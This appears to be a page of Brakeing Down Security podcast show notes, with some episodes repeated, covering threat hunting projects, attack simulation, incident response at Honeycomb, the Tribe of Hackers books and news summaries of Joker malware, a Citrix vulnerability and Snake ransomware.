Book club is starting up again with Hands-On AWS penetration testing with Kali Linux from Gilbert and Caudill. You read and get together to discuss or demo every Monday. Get the book, start reading and meet us for the kick off Monday the 24 at 10pm eastern. The book club meets virtually on zoom, and organizes on slack..get invited like this.”
Book: https://smile.amazon.com/Hands-Penetration-Testing-Kali-Linux/dp/1789136725
NolaCon Training:
https://nolacon.com/training/2020/security-detect-and-defense-ttx
Roberto Rodriguez
Bio
@Cyb3rWard0g on Twitter
Threat Intel vs. Threat Hunting = what’s the difference?
What datasets are you using?
Did you start with any particular dataset, or created your own?
Technique development - what skills are needed?
C2 setup
Detection mechanisms
Honeypots
How can people get involved?
Blacksmith - create ‘mordor’ environment to push scripts to setup honeypot/nets
https://Threathunterplaybook.com
https://github.com/hunters-forge/ThreatHunter-Playbook
https://www.exploit-db.com/exploits/47995 - Sudo buffer overflow
Mordor: The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption.
YAML Example: https://github.com/hunters-forge/ThreatHunter-Playbook/blob/master/playbooks/WIN-190810201010.yaml
Notebook Example:
Jupyter notebook - Definition: https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html
Lateral Movement - WMI - IMAGE Below
SIGMA?
What is a Notebook?
Think of a notebook as a document that you can access via a web interface that allows you to save input (i.e live code) and output (i.e code execution results / evaluated code output) of interactive sessions as well as important notes needed to explain the methodology and steps taken to perform specific tasks (i.e data analysis).
Have a goal for expanding to other parts of ATT&CK?
Threat Hunter Playbook - Goals
- Expedite the development of techniques an hypothesis for hunting campaigns.
- Help Threat Hunters understand patterns of behavior observed during post-exploitation.
- Reduce the number of false positives while hunting by providing more context around suspicious events.
- Share real-time analytics validation examples through cloud computing environments for free.
- Distribute Threat Hunting concepts and processes around the world for free.
- Map pre-recorded datasets to adversarial techniques.
- Accelerate infosec learning through open source resources.
Sub-techniques:
https://medium.com/mitre-attack/attack-sub-techniques-preview-b79ff0ba669a
Slack Channel:
https://launchpass.com/threathunting
Twitter;
https://twitter.com/mattifestation
https://twitter.com/Cyb3rPandaH
on
Brakeing Down Security Podcast on #Pandora-
https://www.pandora.com/podcast/brakeing-down-security-podcast/PC:27866
Marcus Carey https://twitter.com/marcusjcarey
Prolific Author, Defender, Enterprise Architect at ReliaQuest
https://www.darkreading.com/vulnerabilities---threats/reliaquest-acquires-threatcare/d/d-id/1335950
“GreyMatter integrates security data from security incident and event manager (SIEM), endpoint detection and response (EDR), firewalls, threat intelligence feeds, and other security tools, and includes analysis functions and automation. Threatcare's technology — which will become a new feature on the platform — simulates how a specific threat or attack could target an organization's network in order to determine whether its security tools and settings are or are not actually working to thwart the threats.”
Security model - everyone’s is diff
How do you work with your threat model?
A proper threat model
Attack Simulation -
How is this different from doing a typical Incident Response tabletop? Threat modeling systems?
How is this different than a pentest?
Is this automated red teaming? How effective can automated testing be?
Is this like some kind of constant scanning system?
How does this work with threat intel feeds?
Can it simulate ransomware, or any attacks?
Hedgehog principles
A lot of things crappily, and nothing good
Mr. Boettcher: “Why suck at everything…”
Atomic Red Team - https://github.com/redcanaryco/atomic-red-team
ATT&CK Matrix - https://attack.mitre.org/matrices/enterprise/
Tribe of Hackers
https://smile.amazon.com/Tribe-Hackers-Cybersecurity-Advice-World/dp/1793464189 - Red Book
The Tribe of Hackers team is back with a new guide packed with insights from dozens of the world’s leading Red Team security specialists. With their deep knowledge of system vulnerabilities and innovative solutions for correcting security flaws, Red Team hackers are in high demand. Tribe of Hackers Red Team: Tribal Knowledge from the Best in Offensive Cybersecurity takes the valuable lessons and popular interview format from the original Tribe of Hackers and dives deeper into the world of Red Team security with expert perspectives on issues like penetration testing and ethical hacking. This unique guide includes inspiring interviews from influential security specialists, including David Kennedy, Rob Fuller, Jayson E. Street, and Georgia Weidman, who share their real-world learnings on everything from Red Team tools and tactics to careers and communication, presentation strategies, legal concerns, and more
- Learn what it takes to secure a Red Team job and to stand out from other candidates
- Discover how to hone your hacking skills while staying on the right side of the law
- Get tips for collaborating on documentation and reporting
- Explore ways to garner support from leadership on your security proposals
- Identify the most important control to prevent compromising your network
- Uncover the latest tools for Red Team offensive security
https://smile.amazon.com/Tribe-Hackers-Cybersecurity-Advice-World/dp/1119643376 - Yellow Book
Tribe of Hackers: Cybersecurity Advice from the Best Hackers in the World is your guide to joining the ranks of hundreds of thousands of cybersecurity professionals around the world. Whether you’re just joining the industry, climbing the corporate ladder, or considering consulting, Tribe of Hackers offers the practical know-how, industry perspectives, and technical insight you need to succeed in the rapidly growing information security market. This unique guide includes inspiring interviews from 70 security experts, including Lesley Carhart, Ming Chow, Bruce Potter, Robert M. Lee, and Jayson E. Street.
- Get the scoop on the biggest cybersecurity myths and misconceptions about security
- Learn what qualities and credentials you need to advance in the cybersecurity field
- Uncover which life hacks are worth your while
- Understand how social media and the Internet of Things has changed cybersecurity
- Discover what it takes to make the move from the corporate world to your own cybersecurity venture
- Find your favorite hackers online and continue the conversation
https://smile.amazon.com/Tribe-Hackers-Security-Leaders-Cybersecurity/dp/1119643775 - Green Book
(Next out!)
Information security is becoming more important and more valuable all the time. Security breaches can be costly, even shutting businesses and governments down, so security leadership is a high-stakes game. Leading teams of hackers is not always easy, but the future of your organization may depend on it. In this book, the world’s top security experts answer the questions that Chief Information Security Officers and other security leaders are asking, including:
- What’s the most important decision you’ve made or action you’ve taken to enable a business risk?
- How do you lead your team to execute and get results?
- Do you have a workforce philosophy or unique approach to talent acquisition?
- Have you created a cohesive strategy for your information security program or business unit?
https://smile.amazon.com/Tribe-Hackers-Blue-Team-Cybersecurity/dp/1119643414 - Blue Book
(OUT SOON!)
Tribe of Hackers Blue Team goes beyond the bestselling, original Tribe of Hackers book and delves into detail on defensive and preventative techniques. Learn how to grapple with the issues that hands-on security experts and security managers are sure to build into their blue team exercises.
- Discover what it takes to get started building blue team skills
- Learn how you can defend against physical and technical penetration testing
- Understand the techniques that advanced red teamers use against high-value targets
- Identify the most important tools to master as a blue teamer
- Explore ways to harden systems against red team attacks
- Stand out from the competition as you work to advance your cybersecurity career
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 26, 2020
2020-006-Roberto Rodriguez, threat intel, threat hunting, hunter's forge, mordor setup
Full notes and graphics are on www.brakeingsecurity.com
Episode 2020-006
Book club
“And maybe blurb for the cast could go something like this. Book club is starting up again with Hands-On AWS penetration testing with Kali Linux from Gilbert and Caudill. You read and get together to discuss or demo every Monday. Get the book, start reading and meet us for the kick off Monday the 24 at 10pm eastern. The book club meets virtually on zoom, and organizes on slack..get invited like this.”
Book: https://smile.amazon.com/Hands-Penetration-Testing-Kali-Linux/dp/1789136725
NolaCon Training:
https://nolacon.com/training/2020/security-detect-and-defense-ttx
Roberto Rodriguez
Bio
@Cyb3rWard0g on Twitter
Threat Intel vs. Threat Hunting = what’s the difference?
What datasets are you using?
Did you start with any particular dataset, or created your own?
Technique development - what skills are needed?
C2 setup
Detection mechanisms
Honeypots
How can people get involved?
Blacksmith - create ‘mordor’ environment to push scripts to setup honeypot/nets
https://Threathunterplaybook.com
https://github.com/hunters-forge/ThreatHunter-Playbook
https://www.exploit-db.com/exploits/47995 - Sudo buffer overflow
Mordor: The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption.
YAML Example: https://github.com/hunters-forge/ThreatHunter-Playbook/blob/master/playbooks/WIN-190810201010.yaml
Notebook Example:
Jupyter notebook - Definition: https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html
Lateral Movement - WMI - IMAGE Below
SIGMA?
What is a Notebook?
Think of a notebook as a document that you can access via a web interface that allows you to save input (i.e live code) and output (i.e code execution results / evaluated code output) of interactive sessions as well as important notes needed to explain the methodology and steps taken to perform specific tasks (i.e data analysis).
Have a goal for expanding to other parts of ATT&CK?
Threat Hunter Playbook - Goals
- Expedite the development of techniques an hypothesis for hunting campaigns.
- Help Threat Hunters understand patterns of behavior observed during post-exploitation.
- Reduce the number of false positives while hunting by providing more context around suspicious events.
- Share real-time analytics validation examples through cloud computing environments for free.
- Distribute Threat Hunting concepts and processes around the world for free.
- Map pre-recorded datasets to adversarial techniques.
- Accelerate infosec learning through open source resources.
Sub-techniques:
https://medium.com/mitre-attack/attack-sub-techniques-preview-b79ff0ba669a
Slack Channel:
https://launchpass.com/threathunting
Twitter;
https://twitter.com/mattifestation
https://twitter.com/Cyb3rPandaH
Published on: February 19, 2020
2020-005-Marcus J Carey, red team automation, and Tribe of Hackers book series
Brakeing Down Security Podcast on #Pandora-
https://www.pandora.com/podcast/brakeing-down-security-podcast/PC:27866
Marcus Carey https://twitter.com/marcusjcarey
Prolific Author, Defender, Enterprise Architect at ReliaQuest
https://www.darkreading.com/vulnerabilities---threats/reliaquest-acquires-threatcare/d/d-id/1335950
“GreyMatter integrates security data from security incident and event manager (SIEM), endpoint detection and response (EDR), firewalls, threat intelligence feeds, and other security tools, and includes analysis functions and automation. Threatcare's technology — which will become a new feature on the platform — simulates how a specific threat or attack could target an organization's network in order to determine whether its security tools and settings are or are not actually working to thwart the threats.”
Security model - everyone’s is diff
How do you work with your threat model?
A proper threat model
Attack Simulation -
How is this different from doing a typical Incident Response tabletop? Threat modeling systems?
How is this different than a pentest?
Is this automated red teaming? How effective can automated testing be?
Is this like some kind of constant scanning system?
How does this work with threat intel feeds?
Can it simulate ransomware, or any attacks?
Hedgehog principles
A lot of things crappily, and nothing good
Mr. Boettcher: “Why suck at everything…”
Atomic Red Team - https://github.com/redcanaryco/atomic-red-team
ATT&CK Matrix - https://attack.mitre.org/matrices/enterprise/
Tribe of Hackers
https://smile.amazon.com/Tribe-Hackers-Cybersecurity-Advice-World/dp/1793464189 - Red Book
The Tribe of Hackers team is back with a new guide packed with insights from dozens of the world’s leading Red Team security specialists. With their deep knowledge of system vulnerabilities and innovative solutions for correcting security flaws, Red Team hackers are in high demand. Tribe of Hackers Red Team: Tribal Knowledge from the Best in Offensive Cybersecurity takes the valuable lessons and popular interview format from the original Tribe of Hackers and dives deeper into the world of Red Team security with expert perspectives on issues like penetration testing and ethical hacking. This unique guide includes inspiring interviews from influential security specialists, including David Kennedy, Rob Fuller, Jayson E. Street, and Georgia Weidman, who share their real-world learnings on everything from Red Team tools and tactics to careers and communication, presentation strategies, legal concerns, and more
- Learn what it takes to secure a Red Team job and to stand out from other candidates
- Discover how to hone your hacking skills while staying on the right side of the law
- Get tips for collaborating on documentation and reporting
- Explore ways to garner support from leadership on your security proposals
- Identify the most important control to prevent compromising your network
- Uncover the latest tools for Red Team offensive security
https://smile.amazon.com/Tribe-Hackers-Cybersecurity-Advice-World/dp/1119643376 - Yellow Book
Tribe of Hackers: Cybersecurity Advice from the Best Hackers in the World is your guide to joining the ranks of hundreds of thousands of cybersecurity professionals around the world. Whether you’re just joining the industry, climbing the corporate ladder, or considering consulting, Tribe of Hackers offers the practical know-how, industry perspectives, and technical insight you need to succeed in the rapidly growing information security market. This unique guide includes inspiring interviews from 70 security experts, including Lesley Carhart, Ming Chow, Bruce Potter, Robert M. Lee, and Jayson E. Street.
- Get the scoop on the biggest cybersecurity myths and misconceptions about security
- Learn what qualities and credentials you need to advance in the cybersecurity field
- Uncover which life hacks are worth your while
- Understand how social media and the Internet of Things has changed cybersecurity
- Discover what it takes to make the move from the corporate world to your own cybersecurity venture
- Find your favorite hackers online and continue the conversation
https://smile.amazon.com/Tribe-Hackers-Security-Leaders-Cybersecurity/dp/1119643775 - Green Book
(Next out!)
Information security is becoming more important and more valuable all the time. Security breaches can be costly, even shutting businesses and governments down, so security leadership is a high-stakes game. Leading teams of hackers is not always easy, but the future of your organization may depend on it. In this book, the world’s top security experts answer the questions that Chief Information Security Officers and other security leaders are asking, including:
- What’s the most important decision you’ve made or action you’ve taken to enable a business risk?
- How do you lead your team to execute and get results?
- Do you have a workforce philosophy or unique approach to talent acquisition?
- Have you created a cohesive strategy for your information security program or business unit?
https://smile.amazon.com/Tribe-Hackers-Blue-Team-Cybersecurity/dp/1119643414 - Blue Book
(OUT SOON!)
Tribe of Hackers Blue Team goes beyond the bestselling, original Tribe of Hackers book and delves into detail on defensive and preventative techniques. Learn how to grapple with the issues that hands-on security experts and security managers are sure to build into their blue team exercises.
- Discover what it takes to get started building blue team skills
- Learn how you can defend against physical and technical penetration testing
- Understand the techniques that advanced red teamers use against high-value targets
- Identify the most important tools to master as a blue teamer
- Explore ways to harden systems against red team attacks
- Stand out from the competition as you work to advance your cybersecurity career
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 10, 20202020-004-Marcus Carey, ShmooCon Report, threat simulation
Marcus Carey https://twitter.com/marcusjcarey
Prolific Author, Defender, Enterprise Architect at ReliaQuest
https://www.darkreading.com/vulnerabilities---threats/reliaquest-acquires-threatcare/d/d-id/1335950
“GreyMatter integrates security data from security incident and event manager (SIEM), endpoint detection and response (EDR), firewalls, threat intelligence feeds, and other security tools, and includes analysis functions and automation. Threatcare's technology — which will become a new feature on the platform — simulates how a specific threat or attack could target an organization's network in order to determine whether its security tools and settings are or are not actually working to thwart the threats.”
Security model - everyone’s is diff
How do you work with your threat model?
A proper threat model
Attack Simulation -
How is this different from doing a typical Incident Response tabletop? Threat modeling systems?
How is this different than a pentest?
Is this automated red teaming? How effective can automated testing be?
Is this like some kind of constant scanning system?
How does this work with threat intel feeds?
Can it simulate ransomware, or any attacks?
Hedgehog principles
A lot of things crappily, and nothing good
Mr. Boettcher: “Why suck at everything…”
Atomic Red Team - https://github.com/redcanaryco/atomic-red-team
ATT&CK Matrix - https://attack.mitre.org/matrices/enterprise/
Tribe of Hackers
https://smile.amazon.com/Tribe-Hackers-Cybersecurity-Advice-World/dp/1793464189 - Red Book
The Tribe of Hackers team is back with a new guide packed with insights from dozens of the world’s leading Red Team security specialists. With their deep knowledge of system vulnerabilities and innovative solutions for correcting security flaws, Red Team hackers are in high demand. Tribe of Hackers Red Team: Tribal Knowledge from the Best in Offensive Cybersecurity takes the valuable lessons and popular interview format from the original Tribe of Hackers and dives deeper into the world of Red Team security with expert perspectives on issues like penetration testing and ethical hacking. This unique guide includes inspiring interviews from influential security specialists, including David Kennedy, Rob Fuller, Jayson E. Street, and Georgia Weidman, who share their real-world learnings on everything from Red Team tools and tactics to careers and communication, presentation strategies, legal concerns, and more
- Learn what it takes to secure a Red Team job and to stand out from other candidates
- Discover how to hone your hacking skills while staying on the right side of the law
- Get tips for collaborating on documentation and reporting
- Explore ways to garner support from leadership on your security proposals
- Identify the most important control to prevent compromising your network
- Uncover the latest tools for Red Team offensive security
https://smile.amazon.com/Tribe-Hackers-Cybersecurity-Advice-World/dp/1119643376 - Yellow Book
Tribe of Hackers: Cybersecurity Advice from the Best Hackers in the World is your guide to joining the ranks of hundreds of thousands of cybersecurity professionals around the world. Whether you’re just joining the industry, climbing the corporate ladder, or considering consulting, Tribe of Hackers offers the practical know-how, industry perspectives, and technical insight you need to succeed in the rapidly growing information security market. This unique guide includes inspiring interviews from 70 security experts, including Lesley Carhart, Ming Chow, Bruce Potter, Robert M. Lee, and Jayson E. Street.
- Get the scoop on the biggest cybersecurity myths and misconceptions about security
- Learn what qualities and credentials you need to advance in the cybersecurity field
- Uncover which life hacks are worth your while
- Understand how social media and the Internet of Things has changed cybersecurity
- Discover what it takes to make the move from the corporate world to your own cybersecurity venture
- Find your favorite hackers online and continue the conversation
https://smile.amazon.com/Tribe-Hackers-Security-Leaders-Cybersecurity/dp/1119643775 - Green Book
(Next out!)
Information security is becoming more important and more valuable all the time. Security breaches can be costly, even shutting businesses and governments down, so security leadership is a high-stakes game. Leading teams of hackers is not always easy, but the future of your organization may depend on it. In this book, the world’s top security experts answer the questions that Chief Information Security Officers and other security leaders are asking, including:
- What’s the most important decision you’ve made or action you’ve taken to enable a business risk?
- How do you lead your team to execute and get results?
- Do you have a workforce philosophy or unique approach to talent acquisition?
- Have you created a cohesive strategy for your information security program or business unit?
https://smile.amazon.com/Tribe-Hackers-Blue-Team-Cybersecurity/dp/1119643414 - Blue Book
(OUT SOON!)
Tribe of Hackers Blue Team goes beyond the bestselling, original Tribe of Hackers book and delves into detail on defensive and preventative techniques. Learn how to grapple with the issues that hands-on security experts and security managers are sure to build into their blue team exercises.
- Discover what it takes to get started building blue team skills
- Learn how you can defend against physical and technical penetration testing
- Understand the techniques that advanced red teamers use against high-value targets
- Identify the most important tools to master as a blue teamer
- Explore ways to harden systems against red team attacks
- Stand out from the competition as you work to advance your cybersecurity career
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 5, 20202020-003- Liz Fong Jones, tracking Pentesters, setting up MFA for SSH, and Developer Advocates
What is Honeycomb.io?
From the site:
“Honeycomb is a tool for introspecting and interrogating your production systems. We can gather data from any source—from your clients (mobile, IoT, browsers), vendored software, or your own code. Single-node debugging tools miss crucial details in a world where infrastructure is dynamic and ephemeral. Honeycomb is a new type of tool, designed and evolved to meet the real needs of platforms, microservices, serverless apps, and complex systems.”
SSH 2FA gist https://gist.github.com/lizthegrey/9c21673f33186a9cc775464afbdce820
Honeycomb.io for digging into access logs & retracing what pentesters do.
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: January 30, 20202020-002-Liz Fong-Jones discusses blog post about Honeycomb.io Incident Response
Ms. Berlin's appearance on #misec podcast - https://www.youtube.com/watch?v=Cj2IF0zn_BE with @kentgruber and @quantissIA
Blog post:
https://www.honeycomb.io/blog/incident-report-running-dry-on-memory-without-noticing/
What is Honeycomb.io?
From the site:
“Honeycomb is a tool for introspecting and interrogating your production systems. We can gather data from any source—from your clients (mobile, IoT, browsers), vendored software, or your own code. Single-node debugging tools miss crucial details in a world where infrastructure is dynamic and ephemeral. Honeycomb is a new type of tool, designed and evolved to meet the real needs of platforms, microservices, serverless apps, and complex systems.”
What are SLOs and how do you establish them? Are they anything like SLA (Service level agreements)?
Can you give us an idea of timeline? Length of time from issue to IR to resolution?
Are the dashboards mentioned in the blogs post your operations dashboard?
[nope! hashtag no-dashboards]
Leading and lagging indicators ( IT and infosec call them detection and mitigation indicators)
https://kpilibrary.com/topics/lagging-and-leading-indicators
How important is telemetry (or meta-telemetry, since it’s telemetry on telemetry, if I’m reading it right --brbr) in making sure you can understand issues?
Do you have levels of escalation? How do you define those?
When you declared an emergency, how did brainstorming help with addressing the issues? Do that help your org see the way to a proper fix?
Did you follow any specific methodology? Did you have a warroom or web conference?
Communications:
https://twitter.com/lizthegrey/status/1192036833812717568
Can being over transparent be detrimental?
Communication methods in an IR:
Slack
Phone Tree
Ticket system
Emails
What does escalation look like for Ms. Berlin? Mr. Boettcher? (stories or examples?)
Confirmation bias (or “it’s never in our house”) fallacy
“I’ve seen and been a part of that, very prevalent in IT” --brbr
Especially when the bias is based on previous outages/issues
From the blog: “We quickly found ourselves locked in a state of confirmation bias…”
Root Cause Analysis:
Once you diagnosed the issue, how quickly was a fix pushed out?
What kind of documentation or monitoring was generated/added to ensure this won’t happen again?
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: January 23, 20202020-001- Android malware, ugly citrix bugs, and Snake ransomware
Educause conference: https://events.educause.edu/security-professionals-conference/2020/hotel-and-travel
Amanda’s Training that everyone should come to!!! https://nolacon.com/training/2020/security-detect-and-defense-ttx
Follow twitter.com/infosecroleplay
Part 1: New year, new things
Discussion:
What happened over the holidays? What did you get for christmas?
PMP test is scheduled for 10 March
Proposal: Anonymous Hacker segment
Similar to “The Stig” on Top Gear. If you would like to come on and discuss any topic you would like. You’ll have anonymity, we won’t share your contact info
- Will allow people worried that they’ll be ridiculed to share their knowledge
- We can record your 20-30 segment whenever (will need audio/video for it)
- You can take a tutorial from another site (or your own) and review it for us
- 1-2 segments per month
- We can discuss content prior to (we won’t put you on the spot)
- We do have a preliminary
News:
Google removed 1.7K+ Joker Malware infected apps from its Play Store
Full article: https://securityaffairs.co/wordpress/96295/malware/joker-malware-actiity.html
Excerpt:
Google revealed it successfully removed more than 1,700 apps from the Play Store over the past three years that had been infected with the Joker malware.
Google provided technical details of its activity against the Joker malware (aka Bread) operation during the last few years.
The Joker malware is a malicious code camouflaged as a system app and allows attackers to perform a broad range of malicious operations, including disable the Google Play Protect service, install malicious apps, generate fake reviews, and show ads.
The spyware is able to steal SMS messages, contact lists and device information along with to sign victims up for premium service subscriptions.
In October, Google has removed from Google Play 24 apps because they were infected with Joker malware, the 24 malicious apps had a total of 472,000 installs.
“Over the past couple of weeks, we have been observing a new Trojan on GooglePlay. So far, we have detected it in 24 apps with over 472,000+ installs in total.”
apps typically fall into two categories: SMS fraud (older versions) and toll fraud (newer versions). Both of these types of fraud take advantage of mobile billing techniques involving the user’s carrier.” reads the post published by Google.
The newer versions of the Joker malware were involved in toll fraud that consist of tricking victims into subscribing to or purchasing various types of content via their mobile phone bill.
WAP billing: https://en.wikipedia.org/wiki/WAP_billing
Example: “pokemon go allows in-app purchases
Over 25,000 Citrix (NetScaler) endpoints vulnerable to CVE-2019-19781
Full Article: https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/
Excerpt:
On Friday, January 10, 2020, our honeypots detected opportunistic mass scanning activity originating from a host in Germany targeting Citrix Application Delivery Controller (ADC) and Citrix Gateway (also known as NetScaler Gateway) servers vulnerable to CVE-2019-19781. This critical vulnerability allows unauthenticated remote attackers to execute commands on the targeted server after chaining an arbitrary file read/write (directory traversal) flaw.
What type of organizations are affected by CVE-2019-19781? (industries with typically poor or outdated security practices… --brbr)
4,576 unique autonomous systems (network providers) were found to have vulnerable Citrix endpoints on their network. We’ve discovered this vulnerability currently affects:
- Military, federal, state, and city government agencies
- Public universities and schools
- Hospitals and healthcare providers
- Electric utilities and cooperatives
- Major financial and banking institutions
- Numerous Fortune 500 companies
How is CVE-2019-19781 exploited and what is the risk?
This critical vulnerability is easy for attackers to exploit using publicly available proof-of-concept code. Various methods demonstrating how to exploit CVE-2019-19781 have been posted on GitHub by Project Zero India and TrustedSec. A forensic guide is available detailing how to check Citrix servers for evidence of a compromise.
Further exploitation of this vulnerability could be used to spread ransomware (similar to CVE-2019-11510) and cryptocurrency mining malware on sensitive networks. If multiple servers are compromised by the same threat actor, they could be weaponized for coordinated malicious activity such as DDoS attacks.
SNAKE #Ransomware Targets Entire Corporate Systems?
Full Article: https://www.ehackingnews.com/2020/01/snake-ransomware-targets-entire.html
Excerpt:
The new Snake Ransomware family sets out to target the organizations’' corporate networks in all their entirety, written in Golang and containing a significant level of obfuscation, the observations and disclosure for the attacks were made by a group of security specialists from the MalwareHunterTeam.
The Ransomware upon successful infection subsequently erases the machine's Shadow Volume Copies before ending different processes related to SCADA frameworks, network management solutions, virtual machines, and various other tools.
After that, it continues to encrypt the machine's files while skirting significant Windows folders and system files. As a feature of this procedure, it affixes "EKANS" as a file marker alongside a five-character string to the file extension of each file it encrypts. The threat wraps up its encryption routine by dropping a ransom note entitled "Fix-Your-Files.txt" in the C:\Users\Public\Desktop folder, which instructs victims to contact "[email protected]" so as to purchase a decryption tool.
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: January 13, 20202019-046-end of the year, end of the decade, predictions, and how we've all changed
End of year, end of decade
Are things better than 10 years ago? 5 years ago?
If there was one thing to change things for the better, what would that be?
Good, Bad, Ugly
Did naming vulns make things better?
Which industries are doing a good job of securing themselves? Finance?
What do you wished never happened (security/compliance wise)?
Ransomware infections with no bounties
Still have people believing “Nessus” is a pentest
https://www.retailitinsights.com/eventscalendar/eventdetail/1c77d5c6-8625-4f2b-bb98-89cca6590c49
https://www.apics.org/credentials-education/events
The Future
PREDICTIONS!!!
Bryan: The rise of the vetting programs (Companies will want to vet content creators in their eco-systems)
Cybuck: An uptick in surveillance tech; both disguised as cool home smart gadgets and straight up public safety. Triggering a US GDPR type response.
Injection remains as the undisputed heavyweight champion of app sec vulnerability (OWASP top 10). And wishful thinking...broken authentication moves lower, denial of service goes down. https://twitter.com/WeldPond/status/1207383327491137536/photo/1
